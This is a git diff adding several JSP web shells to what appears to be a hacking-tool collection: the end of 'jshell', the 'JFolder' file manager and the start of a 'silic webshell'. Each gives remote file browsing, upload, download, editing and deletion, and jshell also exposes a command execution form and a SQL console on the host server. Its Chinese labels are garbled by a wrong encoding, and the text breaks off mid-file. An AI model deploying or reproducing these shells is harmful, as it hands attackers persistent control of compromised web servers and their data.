    JAVA<%=System.getProperty("java.vm.name")%>
    JAVA·<%=System.getProperty("java.class.path")%>
    JAVA·<%=System.getProperty("java.library.path")%>
    JAVAʱĿ¼<%=System.getProperty("java.io.tmpdir")%>
    JIT<%=System.getProperty("java.compiler") == null ? "" : System.getProperty("java.compiler")%>
    չĿ¼·<%=System.getProperty("java.ext.dirs")%>
    ͻϢ
    ͻַ<%=request.getRemoteAddr()%>
    <%=request.getRemoteHost()%>
    û<%=request.getRemoteUser() == null ? "" : request.getRemoteUser()%>
    ʽ<%=request.getScheme()%>
    Ӧðȫ׽ֲ<%=request.isSecure() == true ? "" : ""%>
    +<% +//======================================================================================= +// end of printing the system info table +///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// + } else if (action.equals("filesystem")) { + String curPath = ""; + String result = ""; + String fsAction = ""; + + if (request.getParameter("curPath") == null) { + curPath = request.getRealPath(request.getServletPath()); + curPath = pathConvert((new File(curPath)).getParent()); + } else { + curPath = Unicode2GB((String)request.getParameter("curPath")); + } + + if (request.getParameter("fsAction") == null) { + fsAction = "list"; + } else { + fsAction = (String)request.getParameter("fsAction"); + } + + if (fsAction.equals("list")) + result = listFiles(curPath, request.getRequestURI() + "?action=" + action); + else if (fsAction.equals("browse")) { + result = listFiles(new File(curPath).getParent(), request.getRequestURI() + "?action=" + action); + result += browseFile(curPath); + } + else if (fsAction.equals("open")) + result = openFile(curPath, request.getRequestURI() + "?action=" + action); + else if (fsAction.equals("save")) { + if (request.getParameter("fileContent") == null) { + result = "ҳ浼"; + } else { + String fileContent = Unicode2GB((String)request.getParameter("fileContent")); + result = saveFile(curPath, request.getRequestURI() + "?action=" + action, fileContent); + } + } else if (fsAction.equals("createFolder")) { + if (request.getParameter("folderName") == null) { + result = "Ŀ¼Ϊ"; + } else { + String folderName = Unicode2GB(request.getParameter("folderName").trim()); + if (folderName.equals("")) { + result = "Ŀ¼Ϊ"; + } else { + result = createFolder(curPath, request.getRequestURI() + "?action=" + action, folderName); + } + } + } else if (fsAction.equals("createFile")) { + if (request.getParameter("fileName") == null) { + result = "ļΪ"; + } else { + String fileName = Unicode2GB(request.getParameter("fileName").trim()); + if (fileName.equals("")) { + result = "ļΪ"; + } else { + result = createFile(curPath, request.getRequestURI() + "?action=" + action, fileName); + } + } + } else if (fsAction.equals("deleteFile")) { + if (request.getParameter("filesDelete") == null) { + result = "ûѡҪɾļ"; + } else { + String[] files2Delete = (String[])request.getParameterValues("filesDelete"); + if (files2Delete.length == 0) { + result = "ûѡҪɾļ"; + } else { + for (int n = 0; n < files2Delete.length; n ++) { + files2Delete[n] = Unicode2GB(files2Delete[n]); + } + result = deleteFile(curPath, request.getRequestURI() + "?action=" + action, files2Delete); + } + } + } else if (fsAction.equals("saveAs")) { + if (request.getParameter("fileContent") == null) { + result = "ҳ浼"; + } else { + String fileContent = Unicode2GB(request.getParameter("fileContent")); + result = saveAs(curPath, request.getRequestURI() + "?action=" + action, fileContent); + } + } else if (fsAction.equals("upload")) { + result = uploadFile(request, curPath, request.getRequestURI() + "?action=" + action); + } else if (fsAction.equals("copyto")) { + if (request.getParameter("filesDelete") == null || request.getParameter("dstPath") == null) { + result = "ûѡҪƵļ"; + } else { + String[] files2Copy = request.getParameterValues("filesDelete"); + String dstPath = request.getParameter("dstPath").trim(); + if (files2Copy.length == 0) { + result = "ûѡҪƵļ"; + } else if (dstPath.equals("")) { + result = "ûдҪƵĿ¼·"; + } else { + for (int i = 0; i < files2Copy.length; i ++) + files2Copy[i] = Unicode2GB(files2Copy[i]); + + result = copyFiles(curPath, request.getRequestURI() + "?action=" + action, files2Copy, Unicode2GB(dstPath)); + } + } + } else if (fsAction.equals("rename")) { + if (request.getParameter("fileRename") == null) { + result = "ҳ浼"; + } else { + String file2Rename = request.getParameter("fileRename").trim(); + String newName = request.getParameter("newName").trim(); + if (file2Rename.equals("")) { + result = "ûѡҪļ"; + } else if (newName.equals("")) { + result = "ûдļ"; + } else { + result = renameFile(curPath, request.getRequestURI() + "?action=" + action, Unicode2GB(file2Rename), Unicode2GB(newName)); + } + } + } +%> + + + + + + + + + +
    ַ +
    <%= result.trim().equals("")?" " : result%>
    +<% +///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// + } else if (action.equals("command")) { + String cmd = ""; + InputStream ins = null; + String result = ""; + + if (request.getParameter("command") != null) { + cmd = (String)request.getParameter("command"); + result = exeCmd(cmd); + } +// print the command form +//======================================================================================== +%> + + + + + + + + + + + + +
    ִ
    + + +
    ִн
    + + + + +
    <%=result == "" ? " " : result%>
    +<% +//========================================================================================= +// end of printing command form +/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// + } else if (action.equals("database")) { + String dbAction = ""; + String result = ""; + String dbType = ""; + String dbServer = ""; + String dbPort = ""; + String dbUsername = ""; + String dbPassword = ""; + String dbName = ""; + String dbResult = ""; + String sql = ""; + + if (request.getParameter("dbAction") == null) { + dbAction = "main"; + } else { + dbAction = request.getParameter("dbAction").trim(); + if (dbAction.equals("")) + dbAction = "main"; + } + + if (dbAction.equals("main")) { + result = " "; + } else if (dbAction.equals("dbConnect")) { + if (request.getParameter("dbType") == null || + request.getParameter("dbServer") == null || + request.getParameter("dbPort") == null || + request.getParameter("dbUsername") == null || + request.getParameter("dbPassword") == null || + request.getParameter("dbName") == null) { + response.sendRedirect(request.getRequestURI() + "?action=" + action); + } else { + dbType = request.getParameter("dbType").trim(); + dbServer = request.getParameter("dbServer").trim(); + dbPort = request.getParameter("dbPort").trim(); + dbUsername = request.getParameter("dbUsername").trim(); + dbPassword = request.getParameter("dbPassword").trim(); + dbName = request.getParameter("dbName").trim(); + + if (DBInit(dbType, dbServer, dbPort, dbUsername, dbPassword, dbName)) { + if (DBConnect(dbUsername, dbPassword)) { + if (request.getParameter("sql") != null) { + sql = request.getParameter("sql").trim(); + if (! sql.equals("")) { + dbResult = DBExecute(sql); + } + } + + result = "\n"; + result += "sql

     \n"; + + DBRelease(); + } else { + result = "ݿʧ"; + } + } else { + result = "ݿûҵ"; + } + } + } +%> + + + "> + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    ݿ + + +
    ݿַ
    ݿ˿
    ݿû
    ݿ
    ݿ
    <%=result%>
    + + + + +
    + <%=dbResult%> +
    +<% + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// + } else if (action.equals("config")) { + String cfAction = ""; + int i; + + if (request.getParameter("cfAction") == null) { + cfAction = "main"; + } else { + cfAction = request.getParameter("cfAction").trim(); + if (cfAction.equals("")) + cfAction = "main"; + } + + if (cfAction.equals("main")) { +// start of config form +//========================================================================================== +%> + + + " onSubmit="javascript:selectAllTypes()"> + + + + + + + + + + + + + + + + + + + + +
    ϵͳ
    Sessionʱʱ
    ɱ༭ļ + + + + + + +
    + + + +

    + +     		+ +
    +
    +<% + } else if (cfAction.equals("save")) { + if (request.getParameter("password") == null || + request.getParameter("encode") == null || + request.getParameter("sessionTime") == null || + request.getParameterValues("textFileTypes") == null) { + response.sendRedirect(request.getRequestURI()); + } + + String result = ""; + + String newPassword = request.getParameter("password").trim(); + String newEncodeType = request.getParameter("encode").trim(); + String newSessionTime = request.getParameter("sessionTime").trim(); + String[] newTextFileTypes = request.getParameterValues("textFileTypes"); + String jshellPath = request.getRealPath(request.getServletPath()); + + try { + JshellConfig jconfig = new JshellConfig(jshellPath); + jconfig.setPassword(newPassword); + jconfig.setEncodeType(newEncodeType); + jconfig.setSessionTime(newSessionTime); + jconfig.setTextFileTypes(newTextFileTypes); + jconfig.save(); + result += "ñɹڷأԺ򡭡"; + result += ""; + } catch (JshellConfigException e) { + result = "" + e.getMessage() + ""; + } + +%> + + + + +
    <%=result == "" ? " " : result%>
    +<% + } +////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +//========================================================================================== +// end of config form + } else if (action.equals("about")) { +// start of about +//========================================================================================== +%> + + + + + + + + + + +
    jshell ver 0.1
    Jshellһ򵥵jspWeb Shellܼܺ򵥡⼸ϿοʱûǸдģҲ˵ΣóϣеôңɶԲãǻӭȤѺҽ
    created by luoluo and welcome to Ӱ
    +<% +//========================================================================================== + } +} +%> + + + \ No newline at end of file diff --git a/jsp/hackk8/fuck-jsp/no.jsp b/jsp/hackk8/fuck-jsp/no.jsp new file mode 100644 index 0000000..3154e83 --- /dev/null +++ b/jsp/hackk8/fuck-jsp/no.jsp @@ -0,0 +1,995 @@ +<% +/** +JFolder V0.9 windows platform +@Filename JFolder.jsp +@Description һ򵥵ϵͳļĿ¼ʾԴṩļˡ +@Author Steven Cee +@Email cqq1978@Gmail.com +@Bugs : ʱļ޷ʾ +*/ +%> +<%@ page contentType="text/html;charset=gb2312"%> +<%@page import="java.io.*,java.util.*,java.net.*" %> +<%! +private final static int languageNo=0; //԰汾0 : ģ 1Ӣ +String strThisFile="JFolder.jsp"; +String[] authorInfo={" дIJãð - - by ǿ http://www.topronet.com "," Thanks for your support - - by Steven Cee http://www.topronet.com "}; +String[] strFileManage = {" ","File Management"}; +String[] strCommand = {"CMD ","Command Window"}; +String[] strSysProperty = {"ϵ ͳ ","System Property"}; +String[] strHelp = {" ","Help"}; +String[] strParentFolder = {"ϼĿ¼","Parent Folder"}; +String[] strCurrentFolder= {"ǰĿ¼","Current Folder"}; +String[] strDrivers = {"","Drivers"}; +String[] strFileName = {"ļ","File Name"}; +String[] strFileSize = {"ļС","File Size"}; +String[] strLastModified = {"޸","Last Modified"}; +String[] strFileOperation= {"ļ","Operations"}; +String[] strFileEdit = {"޸","Edit"}; +String[] strFileDown = {"","Download"}; +String[] strFileCopy = {"","Move"}; +String[] strFileDel = {"ɾ","Delete"}; +String[] strExecute = {"ִ","Execute"}; +String[] strBack = {"","Back"}; +String[] strFileSave = {"","Save"}; + +public class FileHandler +{ + private String strAction=""; + private String strFile=""; + void FileHandler(String action,String f) + { + + } +} + +public static class UploadMonitor { + + static Hashtable uploadTable = new Hashtable(); + + static void set(String fName, UplInfo info) { + uploadTable.put(fName, info); + } + + static void remove(String fName) { + uploadTable.remove(fName); + } + + static UplInfo getInfo(String fName) { + UplInfo info = (UplInfo) uploadTable.get(fName); + return info; + } +} + +public class UplInfo { + + public long totalSize; + public long currSize; + public long starttime; + public boolean aborted; + + public UplInfo() { + totalSize = 0l; + currSize = 0l; + starttime = System.currentTimeMillis(); + aborted = false; + } + + public UplInfo(int size) { + totalSize = size; + currSize = 0; + starttime = System.currentTimeMillis(); + aborted = false; + } + + public String getUprate() { + long time = System.currentTimeMillis() - starttime; + if (time != 0) { + long uprate = currSize * 1000 / time; + return convertFileSize(uprate) + "/s"; + } + else return "n/a"; + } + + public int getPercent() { + if (totalSize == 0) return 0; + else return (int) (currSize * 100 / totalSize); + } + + public String getTimeElapsed() { + long time = (System.currentTimeMillis() - starttime) / 1000l; + if (time - 60l >= 0){ + if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m"; + else return time / 60 + ":0" + (time % 60) + "m"; + } + else return time<10 ? "0" + time + "s": time + "s"; + } + + public String getTimeEstimated() { + if (currSize == 0) return "n/a"; + long time = System.currentTimeMillis() - starttime; + time = totalSize * time / currSize; + time /= 1000l; + if (time - 60l >= 0){ + if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m"; + else return time / 60 + ":0" + (time % 60) + "m"; + } + else return time<10 ? "0" + time + "s": time + "s"; + } + + } + + public class FileInfo { + + public String name = null, clientFileName = null, fileContentType = null; + private byte[] fileContents = null; + public File file = null; + public StringBuffer sb = new StringBuffer(100); + + public void setFileContents(byte[] aByteArray) { + fileContents = new byte[aByteArray.length]; + System.arraycopy(aByteArray, 0, fileContents, 0, aByteArray.length); + } +} + +// A Class with methods used to process a ServletInputStream +public class HttpMultiPartParser { + + private final String lineSeparator = System.getProperty("line.separator", "\n"); + private final int ONE_MB = 1024 * 1; + + public Hashtable processData(ServletInputStream is, String boundary, String saveInDir, + int clength) throws IllegalArgumentException, IOException { + if (is == null) throw new IllegalArgumentException("InputStream"); + if (boundary == null || boundary.trim().length() < 1) throw new IllegalArgumentException( + "\"" + boundary + "\" is an illegal boundary indicator"); + boundary = "--" + boundary; + StringTokenizer stLine = null, stFields = null; + FileInfo fileInfo = null; + Hashtable dataTable = new Hashtable(5); + String line = null, field = null, paramName = null; + boolean saveFiles = (saveInDir != null && saveInDir.trim().length() > 0); + boolean isFile = false; + if (saveFiles) { // Create the required directory (including parent dirs) + File f = new File(saveInDir); + f.mkdirs(); + } + line = getLine(is); + if (line == null || !line.startsWith(boundary)) throw new IOException( + "Boundary not found; boundary = " + boundary + ", line = " + line); + while (line != null) { + if (line == null || !line.startsWith(boundary)) return dataTable; + line = getLine(is); + if (line == null) return dataTable; + stLine = new StringTokenizer(line, ";\r\n"); + if (stLine.countTokens() < 2) throw new IllegalArgumentException( + "Bad data in second line"); + line = stLine.nextToken().toLowerCase(); + if (line.indexOf("form-data") < 0) throw new IllegalArgumentException( + "Bad data in second line"); + stFields = new StringTokenizer(stLine.nextToken(), "=\""); + if (stFields.countTokens() < 2) throw new IllegalArgumentException( + "Bad data in second line"); + fileInfo = new FileInfo(); + stFields.nextToken(); + paramName = stFields.nextToken(); + isFile = false; + if (stLine.hasMoreTokens()) { + field = stLine.nextToken(); + stFields = new StringTokenizer(field, "=\""); + if (stFields.countTokens() > 1) { + if (stFields.nextToken().trim().equalsIgnoreCase("filename")) { + fileInfo.name = paramName; + String value = stFields.nextToken(); + if (value != null && value.trim().length() > 0) { + fileInfo.clientFileName = value; + isFile = true; + } + else { + line = getLine(is); // Skip "Content-Type:" line + line = getLine(is); // Skip blank line + line = getLine(is); // Skip blank line + line = getLine(is); // Position to boundary line + continue; + } + } + } + else if (field.toLowerCase().indexOf("filename") >= 0) { + line = getLine(is); // Skip "Content-Type:" line + line = getLine(is); // Skip blank line + line = getLine(is); // Skip blank line + line = getLine(is); // Position to boundary line + continue; + } + } + boolean skipBlankLine = true; + if (isFile) { + line = getLine(is); + if (line == null) return dataTable; + if (line.trim().length() < 1) skipBlankLine = false; + else { + stLine = new StringTokenizer(line, ": "); + if (stLine.countTokens() < 2) throw new IllegalArgumentException( + "Bad data in third line"); + stLine.nextToken(); // Content-Type + fileInfo.fileContentType = stLine.nextToken(); + } + } + if (skipBlankLine) { + line = getLine(is); + if (line == null) return dataTable; + } + if (!isFile) { + line = getLine(is); + if (line == null) return dataTable; + dataTable.put(paramName, line); + // If parameter is dir, change saveInDir to dir + if (paramName.equals("dir")) saveInDir = line; + line = getLine(is); + continue; + } + try { + UplInfo uplInfo = new UplInfo(clength); + UploadMonitor.set(fileInfo.clientFileName, uplInfo); + OutputStream os = null; + String path = null; + if (saveFiles) os = new FileOutputStream(path = getFileName(saveInDir, + fileInfo.clientFileName)); + else os = new ByteArrayOutputStream(ONE_MB); + boolean readingContent = true; + byte previousLine[] = new byte[2 * ONE_MB]; + byte temp[] = null; + byte currentLine[] = new byte[2 * ONE_MB]; + int read, read3; + if ((read = is.readLine(previousLine, 0, previousLine.length)) == -1) { + line = null; + break; + } + while (readingContent) { + if ((read3 = is.readLine(currentLine, 0, currentLine.length)) == -1) { + line = null; + uplInfo.aborted = true; + break; + } + if (compareBoundary(boundary, currentLine)) { + os.write(previousLine, 0, read - 2); + line = new String(currentLine, 0, read3); + break; + } + else { + os.write(previousLine, 0, read); + uplInfo.currSize += read; + temp = currentLine; + currentLine = previousLine; + previousLine = temp; + read = read3; + }//end else + }//end while + os.flush(); + os.close(); + if (!saveFiles) { + ByteArrayOutputStream baos = (ByteArrayOutputStream) os; + fileInfo.setFileContents(baos.toByteArray()); + } + else fileInfo.file = new File(path); + dataTable.put(paramName, fileInfo); + uplInfo.currSize = uplInfo.totalSize; + }//end try + catch (IOException e) { + throw e; + } + } + return dataTable; + } + + /** + * Compares boundary string to byte array + */ + private boolean compareBoundary(String boundary, byte ba[]) { + byte b; + if (boundary == null || ba == null) return false; + for (int i = 0; i < boundary.length(); i++) + if ((byte) boundary.charAt(i) != ba[i]) return false; + return true; + } + + /** Convenience method to read HTTP header lines */ + private synchronized String getLine(ServletInputStream sis) throws IOException { + byte b[] = new byte[1024]; + int read = sis.readLine(b, 0, b.length), index; + String line = null; + if (read != -1) { + line = new String(b, 0, read); + if ((index = line.indexOf('\n')) >= 0) line = line.substring(0, index - 1); + } + return line; + } + + public String getFileName(String dir, String fileName) throws IllegalArgumentException { + String path = null; + if (dir == null || fileName == null) throw new IllegalArgumentException( + "dir or fileName is null"); + int index = fileName.lastIndexOf('/'); + String name = null; + if (index >= 0) name = fileName.substring(index + 1); + else name = fileName; + index = name.lastIndexOf('\\'); + if (index >= 0) fileName = name.substring(index + 1); + path = dir + File.separator + fileName; + if (File.separatorChar == '/') return path.replace('\\', File.separatorChar); + else return path.replace('/', File.separatorChar); + } +} //End of class HttpMultiPartParser + +String formatPath(String p) +{ + StringBuffer sb=new StringBuffer(); + for (int i = 0; i < p.length(); i++) + { + if(p.charAt(i)=='\\') + { + sb.append("\\\\"); + } + else + { + sb.append(p.charAt(i)); + } + } + return sb.toString(); +} + + /** + * Converts some important chars (int) to the corresponding html string + */ + static String conv2Html(int i) { + if (i == '&') return "&"; + else if (i == '<') return "<"; + else if (i == '>') return ">"; + else if (i == '"') return """; + else return "" + (char) i; + } + + /** + * Converts a normal string to a html conform string + */ + static String htmlEncode(String st) { + StringBuffer buf = new StringBuffer(); + for (int i = 0; i < st.length(); i++) { + buf.append(conv2Html(st.charAt(i))); + } + return buf.toString(); + } +String getDrivers() +/** +Windowsϵͳȡÿõ߼ +*/ +{ + StringBuffer sb=new StringBuffer(strDrivers[languageNo] + " : "); + File roots[]=File.listRoots(); + for(int i=0;i"); + sb.append(roots[i]+" "); + } + return sb.toString(); +} +static String convertFileSize(long filesize) +{ + //bug 5.09M ʾ5.9M + String strUnit="Bytes"; + String strAfterComma=""; + int intDivisor=1; + if(filesize>=1024*1024) + { + strUnit = "MB"; + intDivisor=1024*1024; + } + else if(filesize>=1024) + { + strUnit = "KB"; + intDivisor=1024; + } + if(intDivisor==1) return filesize + " " + strUnit; + strAfterComma = "" + 100 * (filesize % intDivisor) / intDivisor ; + if(strAfterComma=="") strAfterComma=".0"; + return filesize / intDivisor + "." + strAfterComma + " " + strUnit; +} +%> +<% +request.setCharacterEncoding("gb2312"); +String tabID = request.getParameter("tabID"); +String strDir = request.getParameter("path"); +String strAction = request.getParameter("action"); +String strFile = request.getParameter("file"); +String strPath = strDir + "\\" + strFile; +String strCmd = request.getParameter("cmd"); +StringBuffer sbEdit=new StringBuffer(""); +StringBuffer sbDown=new StringBuffer(""); +StringBuffer sbCopy=new StringBuffer(""); +StringBuffer sbSaveCopy=new StringBuffer(""); +StringBuffer sbNewFile=new StringBuffer(""); + +if((tabID==null) || tabID.equals("")) +{ + tabID = "1"; +} + +if(strDir==null||strDir.length()<1) +{ + strDir = request.getRealPath("/"); +} + + +if(strAction!=null && strAction.equals("down")) +{ + File f=new File(strPath); + if(f.length()==0) + { + sbDown.append("ļСΪ 0 ֽڣͲ˰"); + } + else + { + response.setHeader("content-type","text/html; charset=ISO-8859-1"); + response.setContentType("APPLICATION/OCTET-STREAM"); + response.setHeader("Content-Disposition","attachment; filename=\""+f.getName()+"\""); + FileInputStream fileInputStream =new FileInputStream(f.getAbsolutePath()); + out.clearBuffer(); + int i; + while ((i=fileInputStream.read()) != -1) + { + out.write(i); + } + fileInputStream.close(); + out.close(); + } +} + +if(strAction!=null && strAction.equals("del")) +{ + File f=new File(strPath); + f.delete(); +} + +if(strAction!=null && strAction.equals("edit")) +{ + File f=new File(strPath); + BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(f))); + sbEdit.append("
    \r\n"); + sbEdit.append("\r\n"); + sbEdit.append("\r\n"); + sbEdit.append("\r\n"); + sbEdit.append(" "); + sbEdit.append("  "+strPath+"\r\n"); + sbEdit.append("
    "); + sbEdit.append(""); + sbEdit.append("
    "); +} + +if(strAction!=null && strAction.equals("save")) +{ + File f=new File(strPath); + BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(f))); + String strContent=request.getParameter("content"); + bw.write(strContent); + bw.close(); +} +if(strAction!=null && strAction.equals("copy")) +{ + File f=new File(strPath); + sbCopy.append("
    \r\n"); + sbCopy.append("\r\n"); + sbCopy.append("\r\n"); + sbCopy.append("\r\n"); + sbCopy.append("ԭʼļ "+strPath+"

    "); + sbCopy.append("Ŀļ

    "); + sbCopy.append(" "); + sbCopy.append("

     \r\n"); + sbCopy.append("

    "); +} +if(strAction!=null && strAction.equals("savecopy")) +{ + File f=new File(strPath); + String strDesFile=request.getParameter("file2"); + if(strDesFile==null || strDesFile.equals("")) + { + sbSaveCopy.append("

    Ŀļ"); + } + else + { + File f_des=new File(strDesFile); + if(f_des.isFile()) + { + sbSaveCopy.append("

    ĿļѴ,ܸơ"); + } + else + { + String strTmpFile=strDesFile; + if(f_des.isDirectory()) + { + if(!strDesFile.endsWith("\\")) + { + strDesFile=strDesFile+"\\"; + } + strTmpFile=strDesFile+"cqq_"+strFile; + } + + File f_des_copy=new File(strTmpFile); + FileInputStream in1=new FileInputStream(f); + FileOutputStream out1=new FileOutputStream(f_des_copy); + byte[] buffer=new byte[1024]; + int c; + while((c=in1.read(buffer))!=-1) + { + out1.write(buffer,0,c); + } + in1.close(); + out1.close(); + + sbSaveCopy.append("ԭʼļ "+strPath+"

    "); + sbSaveCopy.append("Ŀļ "+strTmpFile+"

    "); + sbSaveCopy.append("Ƴɹ"); + } + } + sbSaveCopy.append("

    "); +} +if(strAction!=null && strAction.equals("newFile")) +{ + String strF=request.getParameter("fileName"); + String strType1=request.getParameter("btnNewFile"); + String strType2=request.getParameter("btnNewDir"); + String strType=""; + if(strType1==null) + { + strType="Dir"; + } + else if(strType2==null) + { + strType="File"; + } + if(!strType.equals("") && !(strF==null || strF.equals(""))) + { + File f_new=new File(strF); + if(strType.equals("File") && !f_new.createNewFile()) + sbNewFile.append(strF+" ļʧ"); + if(strType.equals("Dir") && !f_new.mkdirs()) + sbNewFile.append(strF+" Ŀ¼ʧ"); + } + else + { + sbNewFile.append("

    ļĿ¼"); + } +} + +if((request.getContentType()!= null) && (request.getContentType().toLowerCase().startsWith("multipart"))) +{ + String tempdir="."; + boolean error=false; + response.setContentType("text/html"); + sbNewFile.append("

    ļĿ¼"); + HttpMultiPartParser parser = new HttpMultiPartParser(); + + int bstart = request.getContentType().lastIndexOf("oundary="); + String bound = request.getContentType().substring(bstart + 8); + int clength = request.getContentLength(); + Hashtable ht = parser.processData(request.getInputStream(), bound, tempdir, clength); + if (ht.get("cqqUploadFile") != null) + { + + FileInfo fi = (FileInfo) ht.get("cqqUploadFile"); + File f1 = fi.file; + UplInfo info = UploadMonitor.getInfo(fi.clientFileName); + if (info != null && info.aborted) + { + f1.delete(); + request.setAttribute("error", "Upload aborted"); + } + else + { + String path = (String) ht.get("path"); + if(path!=null && !path.endsWith("\\")) + path = path + "\\"; + if (!f1.renameTo(new File(path + f1.getName()))) + { + request.setAttribute("error", "Cannot upload file."); + error = true; + f1.delete(); + } + } + } +} +%> + + + + + + + +JFoler 0.9 ---A jsp based web folder management tool by Steven Cee + + + + + +

    + + + + + + +
    + + + + + + +<% +StringBuffer sbFolder=new StringBuffer(""); +StringBuffer sbFile=new StringBuffer(""); +try +{ + File objFile = new File(strDir); + File list[] = objFile.listFiles(); + if(objFile.getAbsolutePath().length()>3) + { + sbFolder.append(" "); + sbFolder.append(strParentFolder[languageNo]+"
    - - - - - - - - - - - \r\n "); + + + } + for(int i=0;i "); + sbFolder.append(" "); + sbFolder.append(list[i].getName()+"
    "); + } + else + { + String strLen=""; + String strDT=""; + long lFile=0; + lFile=list[i].length(); + strLen = convertFileSize(lFile); + Date dt=new Date(list[i].lastModified()); + strDT=dt.toLocaleString(); + sbFile.append(""); + sbFile.append(""+list[i].getName()); + sbFile.append(""); + sbFile.append(""+strLen); + sbFile.append(""); + sbFile.append(""+strDT); + sbFile.append(""); + + sbFile.append("  "); + sbFile.append(strFileEdit[languageNo]+" "); + + sbFile.append("  "); + sbFile.append(strFileDel[languageNo]+" "); + + sbFile.append("  "); + sbFile.append(strFileDown[languageNo]+" "); + + sbFile.append("  "); + sbFile.append(strFileCopy[languageNo]+" "); + } + + } +} +catch(Exception e) +{ + out.println("ʧܣ "+e.toString()+""); +} +%> + +
    + + + + + + + + + +
    +

    +
    www.topronet.com ,All Rights Reserved. +
    Any question, please email me cqq1978@Gmail.com + diff --git a/jsp/hackk8/fuck-jsp/silic webshell.jsp b/jsp/hackk8/fuck-jsp/silic webshell.jsp new file mode 100644 index 0000000..a4ce98c --- /dev/null +++ b/jsp/hackk8/fuck-jsp/silic webshell.jsp @@ -0,0 +1,844 @@ +<%@ page contentType="text/html;charset=gb2312"%> +<%@page import="java.io.*,java.util.*,java.net.*" %> +<%! +private final static int languageNo=0; +String strThisFile="JFolder.jsp"; +String[] authorInfo={"Silic Group"}; +String[] strFileManage = {" ","File Management"}; +String[] strCommand = {"CMD ","Command Window"}; +String[] strSysProperty = {"ϵ ͳ ","System Property"}; +String[] strHelp = {" ","Help"}; +String[] strParentFolder = {"ϼĿ¼","Parent Folder"}; +String[] strCurrentFolder= {"ǰĿ¼","Current Folder"}; +String[] strDrivers = {"","Drivers"}; +String[] strFileName = {"ļ","File Name"}; +String[] strFileSize = {"ļС","File Size"}; +String[] strLastModified = {"޸","Last Modified"}; +String[] strFileOperation= {"ļ","Operations"}; +String[] strFileEdit = {"޸","Edit"}; +String[] strFileDown = {"","Download"}; +String[] strFileCopy = {"","Move"}; +String[] strFileDel = {"ɾ","Delete"}; +String[] strExecute = {"ִ","Execute"}; +String[] strBack = {"","Back"}; +String[] strFileSave = {"","Save"}; +public class FileHandler +{ + private String strAction=""; + private String strFile=""; + void FileHandler(String action,String f) + { + } +} +public static class UploadMonitor { + static Hashtable uploadTable = new Hashtable(); + static void set(String fName, UplInfo info) { + uploadTable.put(fName, info); + } + static void remove(String fName) { + uploadTable.remove(fName); + } + static UplInfo getInfo(String fName) { + UplInfo info = (UplInfo) uploadTable.get(fName); + return info; + } +} +public class UplInfo { + public long totalSize; + public long currSize; + public long starttime; + public boolean aborted; + public UplInfo() { + totalSize = 0l; + currSize = 0l; + starttime = System.currentTimeMillis(); + aborted = false; + } + public UplInfo(int size) { + totalSize = size; + currSize = 0; + starttime = System.currentTimeMillis(); + aborted = false; + } + public String getUprate() { + long time = System.currentTimeMillis() - starttime; + if (time != 0) { + long uprate = currSize * 1000 / time; + return convertFileSize(uprate) + "/s"; + } + else return "n/a"; + } + public int getPercent() { + if (totalSize == 0) return 0; + else return (int) (currSize * 100 / totalSize); + } + public String getTimeElapsed() { + long time = (System.currentTimeMillis() - starttime) / 1000l; + if (time - 60l >= 0){ + if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m"; + else return time / 60 + ":0" + (time % 60) + "m"; + } + else return time<10 ? "0" + time + "s": time + "s"; + } + public String getTimeEstimated() { + if (currSize == 0) return "n/a"; + long time = System.currentTimeMillis() - starttime; + time = totalSize * time / currSize; + time /= 1000l; + if (time - 60l >= 0){ + if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m"; + else return time / 60 + ":0" + (time % 60) + "m"; + } + else return time<10 ? "0" + time + "s": time + "s"; + } +} + public class FileInfo { + public String name = null, clientFileName = null, fileContentType = null; + private byte[] fileContents = null; + public File file = null; + public StringBuffer sb = new StringBuffer(100); + public void setFileContents(byte[] aByteArray) { + fileContents = new byte[aByteArray.length]; + System.arraycopy(aByteArray, 0, fileContents, 0, aByteArray.length); + } +} +public class HttpMultiPartParser { + private final String lineSeparator = System.getProperty("line.separator", "\n"); + private final int ONE_MB = 1024 * 1; + public Hashtable processData(ServletInputStream is, String boundary, String saveInDir, + int clength) throws IllegalArgumentException, IOException { + if (is == null) throw new IllegalArgumentException("InputStream"); + if (boundary == null || boundary.trim().length() < 1) throw new IllegalArgumentException( + "\"" + boundary + "\" is an illegal boundary indicator"); + boundary = "--" + boundary; + StringTokenizer stLine = null, stFields = null; + FileInfo fileInfo = null; + Hashtable dataTable = new Hashtable(5); + String line = null, field = null, paramName = null; + boolean saveFiles = (saveInDir != null && saveInDir.trim().length() > 0); + boolean isFile = false; + if (saveFiles) { // Create the required directory (including parent dirs) + File f = new File(saveInDir); + f.mkdirs(); + } + line = getLine(is); + if (line == null || !line.startsWith(boundary)) throw new IOException( + "Boundary not found; boundary = " + boundary + ", line = " + line); + while (line != null) { + if (line == null || !line.startsWith(boundary)) return dataTable; + line = getLine(is); + if (line == null) return dataTable; + stLine = new StringTokenizer(line, ";\r\n"); + if (stLine.countTokens() < 2) throw new IllegalArgumentException( + "Bad data in second line"); + line = stLine.nextToken().toLowerCase(); + if (line.indexOf("form-data") < 0) throw new IllegalArgumentException( + "Bad data in second line"); + stFields = new StringTokenizer(stLine.nextToken(), "=\""); + if (stFields.countTokens() < 2) throw new IllegalArgumentException( + "Bad data in second line"); + fileInfo = new FileInfo(); + stFields.nextToken(); + paramName = stFields.nextToken(); + isFile = false; + if (stLine.hasMoreTokens()) { + field = stLine.nextToken(); + stFields = new StringTokenizer(field, "=\""); + if (stFields.countTokens() > 1) { + if (stFields.nextToken().trim().equalsIgnoreCase("filename")) { + fileInfo.name = paramName; + String value = stFields.nextToken(); + if (value != null && value.trim().length() > 0) { + fileInfo.clientFileName = value; + isFile = true; + } + else { + line = getLine(is); // Skip "Content-Type:" line + line = getLine(is); // Skip blank line + line = getLine(is); // Skip blank line + line = getLine(is); // Position to boundary line + continue; + } + } + } + else if (field.toLowerCase().indexOf("filename") >= 0) { + line = getLine(is); // Skip "Content-Type:" line + line = getLine(is); // Skip blank line + line = 